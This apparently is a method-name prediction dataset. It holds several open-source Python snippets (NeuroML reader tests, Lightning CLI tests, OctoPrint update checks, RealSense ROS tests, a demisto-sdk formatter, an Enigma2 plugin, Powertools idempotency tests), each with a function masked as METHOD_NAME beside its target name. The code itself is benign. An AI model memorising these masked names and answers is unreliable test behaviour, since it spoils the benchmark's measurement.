assert M.integrate(x) == Matrix([x**2/2, x])
assert M.diff(x) == Matrix([1, 0])
assert M.limit(x, 1) == Matrix([1, 1])
assert zeros(2).as_immutable().integrate(x) == zeros(2) | null |
test basic loading | # -*- coding: utf-8 -*-
# test_reader.py ---
#
# Filename: test_reader.py
# Description:
# Author:
# Maintainer:
# Created: Wed Jul 24 16:02:21 2013 (+0530)
# Version:
# Last-Updated: Sun Apr 17 16:13:01 2016 (-0400)
# By: subha
# Update #: 112
# URL:
# Keywords:
# Compatibility:
#
#
# Commentary:
#
#
#
#
# Change log:
#
#
#
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth
# Floor, Boston, MA 02110-1301, USA.
#
#
# Code:
from __future__ import print_function
import unittest
import numpy as np
import moose
import neuroml as nml
from reader import NML2Reader
import os
class TestFullCell(unittest.TestCase):
def setUp(self):
if '/library' in moose.le():
moose.delete('/library')
self.reader = NML2Reader(verbose=True)
self.lib = moose.Neutral('/library')
self.filename = os.path.realpath('test_files/NML2_FullCell.nml')
self.reader.read(self.filename)
for ncell in self.reader.nml_cells_to_moose:
if self.reader.nml_cells_to_moose[ncell].isA("Neuron"):
self.ncell = self.reader.nml_cells_to_moose[ncell]
break
self.mcell = moose.element('/library/SpikingCell')
self.soma = moose.element(self.mcell.path + '/Soma')
self.dendrite1 = moose.element(self.mcell.path + '/Dendrite1')
self.dendrite2 = moose.element(self.mcell.path + '/Dendrite2')
self.spine1 = moose.element(self.mcell.path + '/Spine1')
def METHOD_NAME(self):
self.assertEqual(self.reader.filename, self.filename, 'filename was not set')
self.assertIsNotNone(self.reader.doc, 'doc is None')
def test_createCellPrototype(self):
self.assertEqual(moose.element(self.mcell).className, 'Neuron')
self.assertEqual(moose.element(self.mcell).name, self.ncell.name)
def test_createMorphology(self):
for comp_id in moose.wildcardFind(self.mcell.path + '/##[ISA=Compartment]'):
comp = moose.element(comp_id)
p0 = self.reader.moose_to_nml[comp].proximal
if p0:
self.assertAlmostEqual(comp.x0, float(p0.x)*1e-6) # Assume micron unit for length
self.assertAlmostEqual(comp.y0, float(p0.y)*1e-6)
self.assertAlmostEqual(comp.z0, float(p0.z)*1e-6)
p1 = self.reader.moose_to_nml[comp].distal
self.assertAlmostEqual(comp.x, float(p1.x)*1e-6)
self.assertAlmostEqual(comp.y, float(p1.y)*1e-6)
self.assertAlmostEqual(comp.z, float(p1.z)*1e-6)
def test_connectivity(self):
"""Test raxial-axial connectivity between MOOSE compartments when
there is parent->child relation in NML2."""
msgs_soma = self.soma.msgIn
msgs_dendrite1 = self.dendrite1.msgIn
msgs_dendrite2 = self.dendrite2.msgIn
self.assertEqual(msgs_soma[3].e1.name, self.dendrite1.name)
self.assertEqual(msgs_dendrite1[3].e1.name, self.dendrite2.name)
self.assertEqual(msgs_dendrite2[3].e1.name, self.spine1.name)
def test_capacitance(self):
for comp_id in moose.wildcardFind(self.mcell.path + '/##[ISA=Compartment]'):
comp = moose.element(comp_id)
# We know that a few um^2 compartment with uF/cm^2 specific capacitance must be around a pico Farad.
self.assertTrue((comp.Cm > 0) and (comp.Cm < 1e-6))
def test_protochans(self):
"""TODO: verify the prototype channel."""
for chan_id in moose.wildcardFind('/library/##[ISA=HHChannel]'):
print(moose.element(chan_id))
def test_HHChannels(self):
"""Verify copied channel in membrane properties."""
self.assertTrue(moose.exists(self.soma.path + '/naChansSoma'))
soma_na = moose.element(self.soma.path+'/naChansSoma')
chans = moose.wildcardFind(self.mcell.path + '/##[ISA=HHChannel]')
self.assertTrue(len(chans) < 3) # Only soma and dendrite2 have the channels
self.assertAlmostEqual(soma_na.Gbar, 120e-2 * self.soma.diameter * self.soma.diameter * np.pi, places=6)
'''
Not yet working in NML2...
class TestGran98(unittest.TestCase):
def setUp(self):
self.reader = NML2Reader()
self.lib = moose.Neutral('/library')
self.filename = 'test_files/Granule_98/Granule_98.nml'
self.reader.read(self.filename)
for ncell in self.reader.nml_to_moose:
if isinstance(ncell, nml.Cell):
self.ncell = ncell
break
self.mcell = moose.element(moose.wildcardFind('/##[ISA=Cell]')[0])
def test_CaPool(self):
pass
'''
if __name__ == '__main__':
unittest.main()
#
# test_reader.py ends here | null |
test list all apps paginated | from unittest import mock
from unittest.mock import MagicMock
import pytest as pytest
from lightning_cloud.openapi import (
Externalv1LightningappInstance,
V1LightningappInstanceSpec,
V1LightningappInstanceState,
V1LightningappInstanceStatus,
V1LightningworkState,
V1ListLightningappInstancesResponse,
V1ListLightningworkResponse,
V1ListMembershipsResponse,
V1Membership,
)
from rich.text import Text
from lightning.app.cli.cmd_apps import _AppList, _AppManager
@pytest.mark.parametrize(
("current_state", "desired_state", "expected"),
[
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.RUNNING),
V1LightningappInstanceState.DELETED,
Text("terminating"),
),
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.STOPPED),
V1LightningappInstanceState.RUNNING,
Text("restarting"),
),
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.PENDING),
V1LightningappInstanceState.RUNNING,
Text("restarting"),
),
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.UNSPECIFIED, start_timestamp=None),
V1LightningappInstanceState.RUNNING,
Text("not yet started"),
),
],
)
def test_state_transitions(current_state, desired_state, expected):
actual = _AppList._textualize_state_transitions(current_state=current_state, desired_state=desired_state)
assert actual == expected
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningapp_instance_service_list_lightningapp_instances")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def METHOD_NAME(list_memberships: mock.MagicMock, list_instances: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_instances.side_effect = [
V1ListLightningappInstancesResponse(
lightningapps=[
Externalv1LightningappInstance(
name="test1",
spec=V1LightningappInstanceSpec(desired_state=V1LightningappInstanceState.RUNNING),
status=V1LightningappInstanceStatus(phase=V1LightningappInstanceState.RUNNING),
)
],
next_page_token="page-2",
),
V1ListLightningappInstancesResponse(
lightningapps=[
Externalv1LightningappInstance(
name="test2",
spec=V1LightningappInstanceSpec(desired_state=V1LightningappInstanceState.STOPPED),
status=V1LightningappInstanceStatus(phase=V1LightningappInstanceState.RUNNING),
)
],
),
]
cluster_manager = _AppManager()
cluster_manager.list()
list_memberships.assert_called_once()
assert list_instances.mock_calls == [
mock.call(project_id="default-project", limit=100, phase_in=[]),
mock.call(project_id="default-project", page_token="page-2", limit=100, phase_in=[]), # noqa: S106
]
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningapp_instance_service_list_lightningapp_instances")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_all_apps(list_memberships: mock.MagicMock, list_instances: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_instances.return_value = V1ListLightningappInstancesResponse(lightningapps=[])
cluster_manager = _AppManager()
cluster_manager.list()
list_memberships.assert_called_once()
list_instances.assert_called_once_with(project_id="default-project", limit=100, phase_in=[])
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningwork_service_list_lightningwork")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_components(list_memberships: mock.MagicMock, list_components: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_components.return_value = V1ListLightningworkResponse(lightningworks=[])
cluster_manager = _AppManager()
cluster_manager.list_components(app_id="cheese")
list_memberships.assert_called_once()
list_components.assert_called_once_with(project_id="default-project", app_id="cheese", phase_in=[])
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningwork_service_list_lightningwork")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_components_with_phase(list_memberships: mock.MagicMock, list_components: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_components.return_value = V1ListLightningworkResponse(lightningworks=[])
cluster_manager = _AppManager()
cluster_manager.list_components(app_id="cheese", phase_in=[V1LightningworkState.RUNNING])
list_memberships.assert_called_once()
list_components.assert_called_once_with(
project_id="default-project", app_id="cheese", phase_in=[V1LightningworkState.RUNNING]
)
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningapp_instance_service_list_lightningapp_instances")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_apps_on_cluster(list_memberships: mock.MagicMock, list_instances: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_instances.return_value = V1ListLightningappInstancesResponse(lightningapps=[])
cluster_manager = _AppManager()
cluster_manager.list()
list_memberships.assert_called_once()
list_instances.assert_called_once_with(project_id="default-project", limit=100, phase_in=[])
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch(
"lightning.app.utilities.network.LightningClient.lightningapp_instance_service_delete_lightningapp_instance"
)
@mock.patch("lightning.app.cli.cmd_apps._get_project")
def test_delete_app_on_cluster(get_project_mock: mock.MagicMock, delete_app_mock: mock.MagicMock):
get_project_mock.return_value = V1Membership(project_id="default-project")
cluster_manager = _AppManager()
cluster_manager.delete(app_id="12345")
delete_app_mock.assert_called()
delete_app_mock.assert_called_once_with(project_id="default-project", id="12345") | null |
is current | __license__ = "GNU Affero General Public License http://www.gnu.org/licenses/agpl.html"
__copyright__ = "Copyright (C) 2019 The OctoPrint Project - Released under terms of the AGPLv3 License"
import logging
import pkg_resources
import requests
from octoprint.util.version import (
get_comparable_version,
is_prerelease,
is_python_compatible,
)
INFO_URL = "https://pypi.org/pypi/{package}/json"
logger = logging.getLogger("octoprint.plugins.softwareupdate.version_checks.pypi_release")
def _filter_out_latest(releases, include_prerelease=False, python_version=None):
"""
Filters out the newest of all matching releases.
Tests:
>>> requires_py2 = ">=2.7.9,<3"
>>> requires_py23 = ">=2.7.9, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, <4"
>>> requires_py3 = ">=3.6, <4"
>>> releases = {"1.3.12": [dict(requires_python=requires_py2, upload_time_iso_8601="2019-10-22T10:06:03.190293Z")], "1.4.0rc1": [dict(requires_python=requires_py23, upload_time_iso_8601="2019-11-22T10:06:03.190293Z")], "2.0.0rc1": [dict(requires_python=requires_py3, upload_time_iso_8601="2020-10-22T10:06:03.190293Z")]}
>>> _filter_out_latest(releases, python_version="2.7.9")
'1.3.12'
>>> _filter_out_latest(releases, include_prerelease=True, python_version="2.7.9")
'1.4.0rc1'
>>> _filter_out_latest(releases, include_prerelease=True, python_version="3.6.0")
'2.0.0rc1'
>>> _filter_out_latest(releases, python_version="3.6.0")
"""
releases = [{"version": k, "data": v[0]} for k, v in releases.items()]
# filter out prereleases and versions incompatible to our python
filter_function = lambda release: not is_prerelease(
release["version"]
) and is_python_compatible(
release["data"].get("requires_python", ""), python_version=python_version
)
if include_prerelease:
filter_function = lambda release: is_python_compatible(
release["data"].get("requires_python", ""), python_version=python_version
)
releases = list(filter(filter_function, releases))
if not releases:
return None
# sort by upload date
releases = sorted(
releases, key=lambda release: release["data"].get("upload_time_iso_8601", "")
)
# latest release = last in list
latest = releases[-1]
return latest["version"]
def _get_latest_release(package, include_prerelease):
from ..exceptions import NetworkError
try:
r = requests.get(INFO_URL.format(package=package), timeout=(3.05, 7))
except requests.ConnectionError as exc:
raise NetworkError(cause=exc)
if not r.status_code == requests.codes.ok:
return None
data = r.json()
if "info" not in data or "version" not in data["info"]:
return None
requires_python = data["info"].get("requires_python")
if requires_python and not is_python_compatible(requires_python):
return None
return _filter_out_latest(data["releases"], include_prerelease=include_prerelease)
def METHOD_NAME(release_information):
if release_information["remote"]["value"] is None:
return True
local_version = get_comparable_version(release_information["local"]["value"])
remote_version = get_comparable_version(release_information["remote"]["value"])
return remote_version <= local_version
def get_latest(target, check, online=True, *args, **kwargs):
from ..exceptions import CannotUpdateOffline
if not online and not check.get("offline", False):
raise CannotUpdateOffline()
package = check.get("package")
distribution = pkg_resources.get_distribution(package)
if distribution:
local_version = distribution.version
else:
local_version = None
remote_version = _get_latest_release(
package, include_prerelease=check.get("prerelease", False)
)
information = {
"local": {"name": local_version, "value": local_version},
"remote": {"name": remote_version, "value": remote_version},
}
logger.debug(
"Target: {}, local: {}, remote: {}".format(
target, information["local"]["name"], information["remote"]["name"]
)
)
return information, METHOD_NAME(information) | null |
test depth avg 1 | # Copyright 2023 Intel Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import itertools
import pytest
import rclpy
from sensor_msgs.msg import Image as msg_Image
from sensor_msgs.msg import Imu as msg_Imu
from sensor_msgs.msg import PointCloud2 as msg_PointCloud2
import numpy as np
sys.path.append(os.path.abspath(os.path.dirname(__file__)+"/../utils"))
import pytest_rs_utils
from pytest_rs_utils import launch_descr_with_parameters
from pytest_rs_utils import delayed_launch_descr_with_parameters
from pytest_rs_utils import get_rosbag_file_path
from pytest_rs_utils import get_node_heirarchy
test_params = {"rosbag_filename":get_rosbag_file_path("outdoors_1color.bag"),
'camera_name': 'Vis2_Cam',
'color_width': '0',
'color_height': '0',
'depth_width': '0',
'depth_height': '0',
'infra_width': '0',
'infra_height': '0',
}
'''
This test was ported from rs2_test.py
the command used to run is "python3 realsense2_camera/scripts/rs2_test.py vis_avg_2"
'''
@pytest.mark.rosbag
@pytest.mark.parametrize("delayed_launch_descr_with_parameters", [test_params],indirect=True)
@pytest.mark.launch(fixture=delayed_launch_descr_with_parameters)
class TestVis2(pytest_rs_utils.RsTestBaseClass):
def test_vis_2(self,delayed_launch_descr_with_parameters):
params = delayed_launch_descr_with_parameters[1]
data = pytest_rs_utils.ImageColorGetData(params["rosbag_filename"])
themes = [
{'topic':get_node_heirarchy(params)+'/color/image_raw',
'msg_type':msg_Image,
'expected_data_chunks':1,
'data':data
}
]
try:
'''
initialize, run and check the data
'''
self.init_test("RsTest"+params['camera_name'])
ret = self.run_test(themes)
assert ret[0], ret[1]
assert self.process_data(themes)
finally:
self.shutdown()
def process_data(self, themes):
return super().process_data(themes)
test_params_depth = {"rosbag_filename":get_rosbag_file_path("outdoors_1color.bag"),
'camera_name': 'Depth_W_Cloud',
'color_width': '0',
'color_height': '0',
'depth_width': '0',
'depth_height': '0',
'infra_width': '0',
'infra_height': '0',
'enable_pointcloud': 'true'
}
'''
This test was ported from rs2_test.py
the command used to run is "python3 realsense2_camera/scripts/rs2_test.py depth_w_cloud_1"
'''
@pytest.mark.rosbag
@pytest.mark.parametrize("launch_descr_with_parameters", [test_params_depth],indirect=True)
@pytest.mark.launch(fixture=launch_descr_with_parameters)
class TestDepthWCloud(pytest_rs_utils.RsTestBaseClass):
def test_depth_w_cloud_1(self,launch_descr_with_parameters):
params = launch_descr_with_parameters[1]
data = pytest_rs_utils.ImageDepthGetData(params["rosbag_filename"])
themes = [
{'topic':get_node_heirarchy(params)+'/depth/image_rect_raw',
'msg_type':msg_Image,
'expected_data_chunks':1,
'data':data
}
]
try:
'''
initialize, run and check the data
'''
self.init_test("RsTest"+params['camera_name'])
ret = self.run_test(themes)
assert ret[0], ret[1]
assert self.process_data(themes)
finally:
self.shutdown()
def process_data(self, themes):
return super().process_data(themes)
test_params_depth_avg_1 = {"rosbag_filename":get_rosbag_file_path("outdoors_1color.bag"),
'camera_name': 'Depth_Avg_1',
'color_width': '0',
'color_height': '0',
'depth_width': '0',
'depth_height': '0',
'infra_width': '0',
'infra_height': '0',
}
'''
This test was ported from rs2_test.py
the command used to run is "python3 realsense2_camera/scripts/rs2_test.py depth_avg_1"
'''
@pytest.mark.rosbag
@pytest.mark.parametrize("launch_descr_with_parameters", [test_params_depth_avg_1],indirect=True)
@pytest.mark.launch(fixture=launch_descr_with_parameters)
class TestDepthAvg1(pytest_rs_utils.RsTestBaseClass):
def METHOD_NAME(self,launch_descr_with_parameters):
params = launch_descr_with_parameters[1]
data = pytest_rs_utils.ImageDepthGetData(params["rosbag_filename"])
themes = [
{'topic':get_node_heirarchy(params)+'/depth/image_rect_raw',
'msg_type':msg_Image,
'expected_data_chunks':1,
'data':data
}
]
try:
'''
initialize, run and check the data
'''
self.init_test("RsTest"+params['camera_name'])
ret = self.run_test(themes)
assert ret[0], ret[1]
assert self.process_data(themes)
finally:
self.shutdown()
def process_data(self, themes):
return super().process_data(themes)
| null |
update docker image in script | from typing import Optional, Tuple
from demisto_sdk.commands.common.constants import (
FILETYPE_TO_DEFAULT_FROMVERSION,
TYPE_JS,
TYPE_PWSH,
FileType,
)
from demisto_sdk.commands.common.hook_validations.docker import DockerImageValidator
from demisto_sdk.commands.common.logger import logger
from demisto_sdk.commands.common.tools import is_iron_bank_pack, server_version_compare
from demisto_sdk.commands.format.format_constants import (
ERROR_RETURN_CODE,
SKIP_RETURN_CODE,
SUCCESS_RETURN_CODE,
)
from demisto_sdk.commands.format.update_generic_yml import BaseUpdateYML
class ScriptYMLFormat(BaseUpdateYML):
"""ScriptYMLFormat class is designed to update script YML file according to Demisto's convention.
Attributes:
input (str): the path to the file we are updating at the moment.
output (str): the desired file name to save the updated version of the YML to.
"""
def __init__(
self,
input: str = "",
output: str = "",
path: str = "",
from_version: str = "",
no_validate: bool = False,
update_docker: bool = False,
add_tests: bool = False,
**kwargs,
):
super().__init__(
input,
output,
path,
from_version,
no_validate,
add_tests=add_tests,
**kwargs,
)
self.update_docker = update_docker
if not from_version and self.data.get("type") == TYPE_PWSH:
self.from_version = "5.5.0"
@staticmethod
def METHOD_NAME(
script_obj: dict, file_path: str, from_version: Optional[str] = None
):
"""Update the docker image for the passed script object. Will ignore if this is a javascript
object or using default image (not set).
Args:
script_obj (dict): script object
"""
if script_obj.get("type") == TYPE_JS:
logger.info(
"[yellow]Skipping docker image update as this is a Javascript automation.[/yellow]"
)
return
dockerimage = script_obj.get("dockerimage")
if not dockerimage: # default image -> nothing to do
logger.info(
"[yellow]Skipping docker image update as default docker image is being used.[/yellow]"
)
return
image_name = dockerimage.split(":")[0]
try:
if is_iron_bank_pack(file_path):
latest_tag = DockerImageValidator.get_docker_image_latest_tag_from_iron_bank_request(
image_name
)
else:
latest_tag = DockerImageValidator.get_docker_image_latest_tag_request(
image_name
)
if not latest_tag:
logger.info("[yellow]Failed getting docker image latest tag[/yellow]")
return
except Exception as e:
logger.info(
f"[yellow]Failed getting docker image latest tag. {e} - Invalid docker image[/yellow]"
)
return
full_name = f"{image_name}:{latest_tag}"
if full_name != dockerimage:
logger.info(f"Updating docker image to: {full_name}")
script_obj["dockerimage"] = full_name
if (not from_version) or server_version_compare("5.0.0", from_version) > 0:
# if this is a script that supports 4.5 and earlier. Make sure dockerimage45 is set
if not script_obj.get("dockerimage45"):
logger.info(
f"Setting dockerimage45 to previous image value: {dockerimage} for 4.5 and earlier support"
)
script_obj["dockerimage45"] = dockerimage
else:
logger.info(
f"Already using latest docker image: {dockerimage}. Nothing to update."
)
def update_docker_image(self):
if self.update_docker:
self.METHOD_NAME(
self.data, self.source_file, self.data.get(self.from_version_key)
)
def run_format(self) -> int:
try:
logger.info(
f"\n[blue]================= Updating file {self.source_file} =================[/blue]"
)
super().update_yml(
default_from_version=FILETYPE_TO_DEFAULT_FROMVERSION[FileType.SCRIPT],
)
self.update_tests()
self.update_docker_image()
self.save_yml_to_destination_file()
return SUCCESS_RETURN_CODE
except Exception as err:
logger.info(
f"\n[red]Failed to update file {self.source_file}. Error: {err}[/red]"
)
return ERROR_RETURN_CODE
def format_file(self) -> Tuple[int, int]:
"""Manager function for the integration YML updater."""
format_res = self.run_format()
if format_res:
return format_res, SKIP_RETURN_CODE
else:
return format_res, self.initiate_file_validator() | null |
key cancel | from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSlider, getConfigListEntry
config.plugins.VideoClippingSetup = ConfigSubsection()
config.plugins.VideoClippingSetup.clip_left = ConfigInteger(default=0)
config.plugins.VideoClippingSetup.clip_width = ConfigInteger(default=720)
config.plugins.VideoClippingSetup.clip_top = ConfigInteger(default=0)
config.plugins.VideoClippingSetup.clip_height = ConfigInteger(default=576)
class VideoClippingCoordinates(Screen, ConfigListScreen):
skin = """
<screen position="0,0" size="e,e" title="Video clipping setup" backgroundColor="transparent">
<widget name="config" position="c-175,c-75" size="350,150" foregroundColor="black" backgroundColor="transparent" />
<ePixmap pixmap="buttons/green.png" position="c-145,e-100" zPosition="0" size="140,40" alphatest="on" />
<ePixmap pixmap="buttons/red.png" position="c+5,e-100" zPosition="0" size="140,40" alphatest="on" />
<widget name="ok" position="c-145,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="green" />
<widget name="cancel" position="c+5,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="red" />
</screen>"""
def __init__(self, session):
self.skin = VideoClippingCoordinates.skin
Screen.__init__(self, session)
from Components.ActionMap import ActionMap
from Components.Button import Button
self["ok"] = Button(_("OK"))
self["cancel"] = Button(_("Cancel"))
self.setTitle(_("Video clipping setup"))
self["actions"] = ActionMap(["SetupActions", "ColorActions", "MenuActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.METHOD_NAME,
"green": self.keyGo,
"red": self.METHOD_NAME,
"menu": self.closeRecursive,
}, -2)
self.list = []
ConfigListScreen.__init__(self, self.list, session=session)
left = config.plugins.VideoClippingSetup.clip_left.value
width = config.plugins.VideoClippingSetup.clip_width.value
top = config.plugins.VideoClippingSetup.clip_top.value
height = config.plugins.VideoClippingSetup.clip_height.value
self.clip_step = ConfigSlider(default=1, increment=1, limits=(1, 20))
self.clip_left = ConfigSlider(default=left, increment=self.clip_step.value, limits=(0, 720))
self.clip_width = ConfigSlider(default=width, increment=self.clip_step.value, limits=(0, 720))
self.clip_top = ConfigSlider(default=top, increment=self.clip_step.value, limits=(0, 576))
self.clip_height = ConfigSlider(default=height, increment=self.clip_step.value, limits=(0, 576))
self.list.append(getConfigListEntry(_("step size"), self.clip_step))
self.list.append(getConfigListEntry(_("left"), self.clip_left))
self.list.append(getConfigListEntry(_("width"), self.clip_width))
self.list.append(getConfigListEntry(_("Top"), self.clip_top))
self.list.append(getConfigListEntry(_("height"), self.clip_height))
self["config"].list = self.list
self["config"].l.setList(self.list)
def adjustStep(self):
self.clip_left.increment = self.clip_step.value
self.clip_width.increment = self.clip_step.value
self.clip_top.increment = self.clip_step.value
self.clip_height.increment = self.clip_step.value
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.adjustStep()
self.setPreviewPosition()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.adjustStep()
self.setPreviewPosition()
def setPreviewPosition(self):
setPosition(int(self.clip_left.value), int(self.clip_width.value), int(self.clip_top.value), int(self.clip_height.value))
def keyGo(self):
config.plugins.VideoClippingSetup.clip_left.value = self.clip_left.value
config.plugins.VideoClippingSetup.clip_width.value = self.clip_width.value
config.plugins.VideoClippingSetup.clip_top.value = self.clip_top.value
config.plugins.VideoClippingSetup.clip_height.value = self.clip_height.value
config.plugins.VideoClippingSetup.save()
self.close()
def METHOD_NAME(self):
setConfiguredPosition()
self.close()
def setPosition(clip_left, clip_width, clip_top, clip_height):
if clip_left + clip_width > 720:
clip_width = 720 - clip_left
if clip_top + clip_height > 576:
clip_height = 576 - clip_top
try:
file = open("/proc/stb/vmpeg/0/clip_left", "w")
file.write('%X' % clip_left)
file.close()
file = open("/proc/stb/vmpeg/0/clip_width", "w")
file.write('%X' % clip_width)
file.close()
file = open("/proc/stb/vmpeg/0/clip_top", "w")
file.write('%X' % clip_top)
file.close()
file = open("/proc/stb/vmpeg/0/clip_height", "w")
file.write('%X' % clip_height)
file.close()
except:
return
def setConfiguredPosition():
setPosition(int(config.plugins.VideoClippingSetup.clip_left.value), int(config.plugins.VideoClippingSetup.clip_width.value), int(config.plugins.VideoClippingSetup.clip_top.value), int(config.plugins.VideoClippingSetup.clip_height.value))
def main(session, **kwargs):
session.open(VideoClippingCoordinates)
def startup(reason, **kwargs):
setConfiguredPosition()
def startMain(menuid):
if menuid != "video_menu":
return []
return [(_("Video clipping"), main, "video_clipping", 10)]
def Plugins(**kwargs):
from os import path
if path.exists("/proc/stb/vmpeg/0/clip_left"):
from Plugins.Plugin import PluginDescriptor
return [PluginDescriptor(name="Video clipping setup", description="", where=PluginDescriptor.WHERE_SESSIONSTART, fnc=startup),
PluginDescriptor(name=_("Video clipping"), description=_("clip overscan / letterbox borders"), where=PluginDescriptor.WHERE_MENU, needsRestart=False, fnc=startMain)]
return [] | null |
function thread safety handler fn arn | import json
from time import sleep
import pytest
from tests.e2e.utils import data_fetcher
from tests.e2e.utils.data_fetcher.common import GetLambdaResponseOptions, get_lambda_response_in_parallel
@pytest.fixture
def ttl_cache_expiration_handler_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("TtlCacheExpirationHandlerArn", "")
@pytest.fixture
def ttl_cache_timeout_handler_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("TtlCacheTimeoutHandlerArn", "")
@pytest.fixture
def parallel_execution_handler_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("ParallelExecutionHandlerArn", "")
@pytest.fixture
def METHOD_NAME(infrastructure: dict) -> str:
return infrastructure.get("FunctionThreadSafetyHandlerArn", "")
@pytest.fixture
def optional_idempotency_key_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("OptionalIdempotencyKeyHandlerArn", "")
@pytest.fixture
def idempotency_table_name(infrastructure: dict) -> str:
return infrastructure.get("DynamoDBTable", "")
@pytest.mark.xdist_group(name="idempotency")
def test_ttl_caching_expiration_idempotency(ttl_cache_expiration_handler_fn_arn: str):
# GIVEN
payload = json.dumps({"message": "Powertools for AWS Lambda (Python) - TTL 5s"})
# WHEN
# first execution
first_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_expiration_handler_fn_arn,
payload=payload,
)
first_execution_response = first_execution["Payload"].read().decode("utf-8")
# the second execution should return the same response as the first execution
second_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_expiration_handler_fn_arn,
payload=payload,
)
second_execution_response = second_execution["Payload"].read().decode("utf-8")
# wait 8s to expire ttl and execute again, this should return a new response value
sleep(8)
third_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_expiration_handler_fn_arn,
payload=payload,
)
third_execution_response = third_execution["Payload"].read().decode("utf-8")
# THEN
assert first_execution_response == second_execution_response
assert third_execution_response != second_execution_response
@pytest.mark.xdist_group(name="idempotency")
def test_ttl_caching_timeout_idempotency(ttl_cache_timeout_handler_fn_arn: str):
# GIVEN
payload_timeout_execution = json.dumps(
{"sleep": 5, "message": "Powertools for AWS Lambda (Python) - TTL 1s"},
sort_keys=True,
)
payload_working_execution = json.dumps(
{"sleep": 0, "message": "Powertools for AWS Lambda (Python) - TTL 1s"},
sort_keys=True,
)
# WHEN
# first call should fail due to timeout
execution_with_timeout, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_timeout_handler_fn_arn,
payload=payload_timeout_execution,
raise_on_error=False,
)
execution_with_timeout_response = execution_with_timeout["Payload"].read().decode("utf-8")
# the second call should work and return the payload
execution_working, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_timeout_handler_fn_arn,
payload=payload_working_execution,
)
execution_working_response = execution_working["Payload"].read().decode("utf-8")
# THEN
assert "Task timed out after" in execution_with_timeout_response
assert payload_working_execution == execution_working_response
@pytest.mark.xdist_group(name="idempotency")
def test_parallel_execution_idempotency(parallel_execution_handler_fn_arn: str):
# GIVEN
payload = json.dumps({"message": "Powertools for AWS Lambda (Python) - Parallel execution"})
invocation_options = [
GetLambdaResponseOptions(lambda_arn=parallel_execution_handler_fn_arn, payload=payload, raise_on_error=False),
GetLambdaResponseOptions(lambda_arn=parallel_execution_handler_fn_arn, payload=payload, raise_on_error=False),
]
# WHEN executing Lambdas in parallel
execution_result_list = get_lambda_response_in_parallel(invocation_options)
timeout_execution_response = execution_result_list[0][0]["Payload"].read().decode("utf-8")
error_idempotency_execution_response = execution_result_list[1][0]["Payload"].read().decode("utf-8")
# THEN
assert "Execution already in progress with idempotency key" in error_idempotency_execution_response
assert "Task timed out after" in timeout_execution_response
@pytest.mark.xdist_group(name="idempotency")
def test_idempotent_function_thread_safety(METHOD_NAME: str):
# GIVEN
payload = json.dumps({"message": "Powertools for AWS Lambda (Python) - Idempotent function thread safety check"})
# WHEN
# first execution
first_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=METHOD_NAME,
payload=payload,
)
